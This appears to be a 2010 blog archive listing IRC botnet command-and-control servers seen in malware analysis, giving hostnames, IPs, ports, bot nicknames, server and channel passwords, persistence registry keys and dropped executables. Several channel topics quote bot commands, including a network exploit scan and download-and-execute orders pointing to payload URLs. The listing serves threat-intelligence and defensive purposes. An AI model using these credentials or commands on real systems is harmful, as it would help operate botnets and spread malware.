Month: September 2010

fear.serveirc.com

Uncategorized

Botnet C&C irc fear.serveirc.com DNS_TYPE_A 89.248.166.44 fear.serveirc.com:6667 Nick: [AUS|XP|azjskuc] Username: smuekvq Server Pass: serverpass Joined Channel: #Slapped Channel Topic for Channel #Slapped: “Stay The Fuck Out Buyer’s ONLY!” Private Message to Channel #Slapped: “* xc2xab Stay out of the #Slapped channel, and rudebois channels…. xc2xbb ^Oxe2x80x94I-n-v-i-s-i-o-nxe2x80x94^O” Process Created HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon Taskman C:Documents and SettingsAdministratorApplication Datazillusion56.exe

dns.aswend.com

Uncategorized

Botnet C&C irc dns.aswend.com DNS_TYPE_A 70.107.249.167 dns.aswend.com :7000 Nick: FL884598362786 Username: wbwhvoslaqyfjb Joined Channel: #GL with Password .x. Channel Topic for Channel #GL: “.advscan asn1smbnt 100 5 0 -b -r -s” Process Created C:WINDOWSsystem32cgxygxc.exe

www.MSNAREA.COM

Uncategorized

Botnet C&C irc www.MSNAREA.COM DNS_TYPE_A 88.255.104.162 www.MSNAREA.COM:80 Nick: uuicarvepthv Username: zebsjikjlegl Server Pass: sexy Joined Channel: ##6 with Password ^B^B^B^B Process Created HKLMSoftwareMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635613} StubPath c:RECYCLERS-51-9-25-3434476501-1642491965-601313314-1214psdfg.exe

power.botsgod.info

Uncategorized

Botnet C&C irc power.botsgod.info 95.142.163.184 92.243.28.194 power.botsgod.info:4949 Nick: {NOVY}[AUS][XP-SP3]842982 Username: VirUs Joined Channel: #PoWEr# with Password VrX Process Created HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun HKUS-1-5-21-842925246-1425521274-308236825-500SOFTWAREMicrosoftWindowsCurrentVersionRun Microsoft iexplorer8.2 Process: C:DOCUME~1ADMINI~1LOCALS~1Tempiexplorer.exe

xxl.myftp.org

Uncategorized

Botnet C&C irc xxl.myftp.org DNS_TYPE_A 84.19.172.60 xxl.myftp.org :6667 Nick: [AUS|00|P|43801] Username: XP-5982 Server Pass: test Joined Channel: ##ii## with Password ##ii## Private Message to Channel ##ii##: “[IM]: Thread Activated: Sending Message.” Process Created C:WINDOWSnotepad2.exe Topic is ‘.msn.msg free version of itunes download here: http://www.thaibookcafe.com/logs/un.exe?=’ Set by KoRn on Thu Sep 09 02:21:25

swo3.botsgod.info

Uncategorized

Botnet C&C irc swo3.botsgod.info DNS_TYPE_A 67.159.2.117 swo3.botsgod.info:4949 Nick: {NOVY}[AUS][XP-SP3]065873 Username: VirUs Joined Channel: #sWo3# with Password VrX Channel Topic for Channel #sWo3#: “!clean | !join #x” Private Message to Channel #sWo3#: “Specified process killed.” Process Created C:DOCUME~1ADMINI~1LOCALS~1TempMSFW.exe

justtestingit.psybnc.cz

Uncategorized

Botnet C&C irc justtestingit.psybnc.cz ip: 92.243.21.112 justtestingit.psybnc.cz:9595 Channel:#-SC-# pass:jessica ftpd to get bot ftpdftpds.psybnc.cz:8989 user:upload pass:upload Process Created C:windows/dn.exe

swo4.botsgod.info(Values botnet )

Uncategorized

Botnet C&C irc swo4.botsgod.info DNS_TYPE_A 95.142.163.184 swo4.botsgod.info :12345 Nick: {NOVY}[AUS][XP-SP3]237681 Username: VirUs Joined Channel: #sWo4# with Password VrX Channel Topic for Channel #sWo4#: “!NAZELswo4 http://www.sitepalace.com/facebookofsex/blazep1.jpeg MSUPDATE.exe 1” Private Message to Channel #sWo4#: “Executed process “MSUPDATE.exe”.” Process Created C:DOCUME~1ADMINI~1LOCALS~1Tempswo4.exe

java.KUTLUFAMILY.COm

Uncategorized

Botnet C&C irc java.KUTLUFAMILY.COm ip: 88.255.104.171 java.KUTLUFAMILY.COm ip: 88.255.104.172 java.KUTLUFAMILY.COm:81 User Name: SP3-920 Real Name: HOME-OFF-D5F0AC Nick Name: [N00_USA_XP_7173355] Channel: #oo #xs #kk Process Created HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun Microsoft Driver Setup C:WINDOWSsystem32Zsorm.exe

magic.metraiciono.com

Uncategorized

Botnet C&C irc magic.metraiciono.com DNS_TYPE_A 74.82.57.173 magic.metraiciono.com:6567 Nick: [SI|AUS|00|P|00638] Username: XP-6610 Server Pass: s1m0n3t4 Joined Channel: #inlove# with Password c1rc0dus0leil Process Created C:WINDOWSwinsont.exe